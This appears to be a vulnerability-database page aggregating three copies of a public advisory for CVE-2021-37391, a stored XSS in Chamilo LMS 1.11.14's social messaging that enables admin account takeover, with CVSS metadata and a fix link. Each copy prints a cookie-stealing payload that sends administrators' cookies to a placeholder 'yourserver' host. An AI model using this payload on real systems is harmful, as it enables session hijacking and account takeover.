Chamilo LMS 1.11.14 - Account Takeover

2022-02-02T00:00:00

Description

{"id": "EDB-ID:50694", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Chamilo LMS 1.11.14 - Account Takeover", "description": "", "published": "2022-02-02T00:00:00", "modified": "2022-02-02T00:00:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "href": "https://www.exploit-db.com/exploits/50694", "reporter": "sirpedrotavares", "references": [], "cvelist": ["CVE-2021-37391", "2021-37391"], "immutableFields": [], "lastseen": "2022-02-10T00:00:00", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-37391"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165807"]}, {"type": "zdt", "idList": ["1337DAY-ID-37294"]}], "rev": 4}, "score": {"value": 4.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-37391"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165807"]}, {"type": "zdt", "idList": ["1337DAY-ID-37294"]}]}, "exploitation": null, "vulnersScore": 4.7}, "sourceHref": "https://www.exploit-db.com/download/50694", "sourceData": "# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover\r\n# Date: July 21 2021\r\n# Exploit Author: sirpedrotavares\r\n# Vendor Homepage: https://chamilo.org\r\n# Software Link: https://chamilo.org\r\n# Version: Chamilo-lms-1.11.x\r\n# Tested on: Chamilo-lms-1.11.x\r\n# CVE: CVE-2021-37391\r\n#Publication:\r\nhttps://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities\r\n\r\n\r\nDescription: A user without privileges in Chamilo LMS 1.11.x can send an\r\ninvitation message to another user, e.g., the administrator, through\r\nmain/social/search.php,\r\nmain/inc/lib/social.lib.php and steal cookies or execute arbitrary code on\r\nthe administration side via a stored XSS vulnerability via social network\r\nthe send invitation feature. .\r\nCVE ID: CVE-2021-37391\r\nCVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N\r\nURL:\r\nhttps://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities\r\n\r\nAffected parameter: send private message - text field\r\nPayload: <img src=x onerror=this.src='\r\nhttp://yourserver/?c='+document.cookie>\r\n\r\n\r\nSteps to reproduce:\r\n 1. Navigate to the social network menu\r\n 2. Select the victim profile\r\n 3. Add the payload on the text field\r\n 4. Submit the request and wait for the payload execution\r\n\r\n*Impact:* By using this vulnerability, an unprivileged user can steal\r\ncookies from an admin account or force the administrator to create an\r\naccount with admin privileges with an HTTP 302 redirect.\r\n*Mitigation*: Update the Chamilo to the latest version.\r\n*Fix*:\r\nhttps://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8\r\n\r\n\r\n\r\n\r\nCom os meus melhores cumprimentos,\r\n--\r\n*Pedro Tavares*\r\nFounder and Editor-in-Chief at seguranca-informatica.pt\r\nCo-founder of CSIRT.UBI\r\nCreator of 0xSI_f33d <https://feed.seguranca-informatica.pt/>\r\n\r\n\r\n\r\nseguranca-informatica.pt | @sirpedrotavares\r\n<https://twitter.com/sirpedrotavares> | 0xSI_f33d\r\n<https://feed.seguranca-informatica.pt/>", "osvdbidlist": [], "exploitType": "webapps", "verified": false, "_state": {"dependencies": 1646391745}}

{"cve": [{"lastseen": "2022-03-23T18:55:02", "description": "A user without privileges in Chamilo LMS 1.11.14 can send an invitation message to another user, e.g., the administrator, through main/social/search.php, main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on the administration side via a stored XSS vulnerability via social network the send invitation feature.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-08-10T20:15:00", "type": "cve", "title": "CVE-2021-37391", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37391"], "modified": "2021-08-19T17:05:00", "cpe": [], "id": "CVE-2021-37391", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-37391", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2022-02-10T00:00:00", "description": "", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2022-02-02T00:00:00", "type": "zdt", "title": "Chamilo LMS 1.11.14 - Account Takeover Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37391"], "modified": "2022-02-02T00:00:00", "id": "1337DAY-ID-37294", "href": "https://0day.today/exploit/description/37294", "sourceData": "# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover\n# Exploit Author: sirpedrotavares\n# Vendor Homepage: https://chamilo.org\n# Software Link: https://chamilo.org\n# Version: Chamilo-lms-1.11.x\n# Tested on: Chamilo-lms-1.11.x\n# CVE: CVE-2021-37391\n#Publication:\nhttps://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities\n\n\nDescription: A user without privileges in Chamilo LMS 1.11.x can send an\ninvitation message to another user, e.g., the administrator, through\nmain/social/search.php,\nmain/inc/lib/social.lib.php and steal cookies or execute arbitrary code on\nthe administration side via a stored XSS vulnerability via social network\nthe send invitation feature. .\nCVE ID: CVE-2021-37391\nCVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N\nURL:\nhttps://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities\n\nAffected parameter: send private message - text field\nPayload: <img src=x onerror=this.src='\nhttp://yourserver/?c='+document.cookie>\n\n\nSteps to reproduce:\n 1. Navigate to the social network menu\n 2. Select the victim profile\n 3. Add the payload on the text field\n 4. Submit the request and wait for the payload execution\n\n*Impact:* By using this vulnerability, an unprivileged user can steal\ncookies from an admin account or force the administrator to create an\naccount with admin privileges with an HTTP 302 redirect.\n*Mitigation*: Update the Chamilo to the latest version.\n*Fix*:\nhttps://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8\n\n\n\n\nCom os meus melhores cumprimentos,\n--\n*Pedro Tavares*\nFounder and Editor-in-Chief at seguranca-informatica.pt\nCo-founder of CSIRT.UBI\nCreator of 0xSI_f33d <https://feed.seguranca-informatica.pt/>\n\n\n\nseguranca-informatica.pt | @sirpedrotavares\n<https://twitter.com/sirpedrotavares> | 0xSI_f33d\n<https://feed.seguranca-informatica.pt/>\n", "sourceHref": "https://0day.today/exploit/37294", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2022-02-10T00:00:00", "description": "", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2022-02-02T00:00:00", "type": "packetstorm", "title": "Chamilo LMS 1.11.14 Cross Site Scripting / Account Takeover", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37391"], "modified": "2022-02-02T00:00:00", "id": "PACKETSTORM:165807", "href": "https://packetstormsecurity.com/files/165807/Chamilo-LMS-1.11.14-Cross-Site-Scripting-Account-Takeover.html", "sourceData": "`# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover \n# Date: July 21 2021 \n# Exploit Author: sirpedrotavares \n# Vendor Homepage: https://chamilo.org \n# Software Link: https://chamilo.org \n# Version: Chamilo-lms-1.11.x \n# Tested on: Chamilo-lms-1.11.x \n# CVE: CVE-2021-37391 \n#Publication: \nhttps://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities \n \n \nDescription: A user without privileges in Chamilo LMS 1.11.x can send an \ninvitation message to another user, e.g., the administrator, through \nmain/social/search.php, \nmain/inc/lib/social.lib.php and steal cookies or execute arbitrary code on \nthe administration side via a stored XSS vulnerability via social network \nthe send invitation feature. . \nCVE ID: CVE-2021-37391 \nCVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N \nURL: \nhttps://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities \n \nAffected parameter: send private message - text field \nPayload: <img src=x onerror=this.src=' \nhttp://yourserver/?c='+document.cookie> \n \n \nSteps to reproduce: \n1. Navigate to the social network menu \n2. Select the victim profile \n3. Add the payload on the text field \n4. Submit the request and wait for the payload execution \n \n*Impact:* By using this vulnerability, an unprivileged user can steal \ncookies from an admin account or force the administrator to create an \naccount with admin privileges with an HTTP 302 redirect. \n*Mitigation*: Update the Chamilo to the latest version. \n*Fix*: \nhttps://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8 \n \n \n \n \nCom os meus melhores cumprimentos, \n-- \n*Pedro Tavares* \nFounder and Editor-in-Chief at seguranca-informatica.pt \nCo-founder of CSIRT.UBI \nCreator of 0xSI_f33d <https://feed.seguranca-informatica.pt/> \n \n \n \nseguranca-informatica.pt | @sirpedrotavares \n<https://twitter.com/sirpedrotavares> | 0xSI_f33d \n<https://feed.seguranca-informatica.pt/> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165807/chamilolms11114-xss.txt", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}]}

Chamilo LMS 1.11.14 - Account Takeover

Description

Related